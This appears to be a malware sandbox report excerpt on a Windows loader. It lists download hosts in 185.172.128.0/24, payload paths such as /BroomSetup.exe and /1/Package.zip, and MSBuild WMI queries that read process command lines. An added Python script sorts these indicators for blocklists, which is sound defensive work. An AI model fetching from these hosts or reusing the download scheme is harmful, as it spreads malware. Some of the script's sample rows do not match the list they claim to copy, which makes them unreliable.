Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.59 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.59 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.203 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.203 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /syncUpd.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /syncUpd.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /timeSync.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /timeSync.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.203 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.59 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /timeSync.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /syncUpd.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /1/Package.zip 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /1/Package.zip 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /1/Package.zip 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .zip 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .zip 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: \run.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: \run.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /BroomSetup.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /BroomSetup.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /BroomSetup.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: @ 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.90 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.90 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.90 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: Installed 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: Installed 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.59 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.59 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.203 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.203 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /syncUpd.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /syncUpd.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /timeSync.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /timeSync.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.203 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.59 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /timeSync.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /syncUpd.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /1/Package.zip 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /1/Package.zip 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /1/Package.zip 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .zip 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .zip 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: \run.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: \run.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /BroomSetup.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /BroomSetup.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /BroomSetup.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .exe 0_2_03694C75
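The "Command line argument" rows above are string references the sandbox recovered from two functions of the loader, 0_2_00424A0E in the original image and 0_2_03694C75 in a second, higher-addressed copy of the same code, which fits the unpacking the report flags. Read together they give the download stage's components: four hosts in 185.172.128.0/24 and the paths /syncUpd.exe, /timeSync.exe, /1/Package.zip and /BroomSetup.exe, plus the local name run.exe. The strings alone do not say which path is fetched from which host; that pairing has to come from the report's network section, not from this list. The following added example (not part of the report or of any Joe Sandbox tooling) parses rows in exactly this shape into de-duplicated IOC buckets so they can be fed to a blocklist or a hunt query. The sample rows are a constructed subset copied from the list above; the row regex and the bucket names are this example's own assumptions.

```python
import ipaddress
import re

# Constructed sample: a subset of the "Command line argument" rows from the report,
# in the same "Source: <image> Command line argument: <value> <function>" shape.
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: two 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.90 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.90 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: Installed 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /syncUpd.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /timeSync.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: .exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /1/Package.zip 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: \run.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: /BroomSetup.exe 0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: @ 0_2_03694C75
"""

# Assumed row layout: image path, literal marker, the value, then the function id
# (e.g. 0_2_00424A0E) at the end of the line. The value is anchored between the
# marker and the trailing function id, so values containing spaces survive.
ROW_RE = re.compile(
    r"^Source: (?P<image>.+?) Command line argument: (?P<value>.*?) "
    r"(?P<func>\d+_\d+_[0-9A-Fa-f]+)$"
)


def classify(value: str) -> str:
    """Bucket one recovered string by the role it plays in the download stage."""
    try:
        ip = ipaddress.ip_address(value)
        # Only routable addresses are worth blocking; RFC1918 etc. go to a side bucket.
        return "ips" if ip.is_global else "private_ips"
    except ValueError:
        pass
    # A URL path fragment: leading slash and a file name with an extension at the end.
    if value.startswith("/") and "." in value.rsplit("/", 1)[-1]:
        return "url_paths"
    # A Windows path fragment such as \run.exe: the name the payload is written under.
    if value.startswith("\\") and len(value) > 1:
        return "file_names"
    # Everything else (format pieces like ".exe", "@", status words like "Installed").
    return "other"


def extract_iocs(report_text: str) -> dict:
    """Parse report rows into order-preserving, de-duplicated IOC buckets."""
    buckets = {"ips": [], "private_ips": [], "url_paths": [], "file_names": [], "other": []}
    for line in report_text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        value = m.group("value")
        key = classify(value)
        item = value.lstrip("\\") if key == "file_names" else value
        if item not in buckets[key]:
            buckets[key].append(item)
    return buckets


if __name__ == "__main__":
    for bucket, items in extract_iocs(SAMPLE_ROWS).items():
        print(f"{bucket}: {items}")
```

Run it against the full row list rather than the sample to get all four hosts; the `other` bucket is worth a glance too, since words like "Installed" and "two" are usually beacon parameters or status strings sent back to the download host.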
Source: sx8RE6LbG0.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3424
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5564
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1964
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 332
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3756
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2836
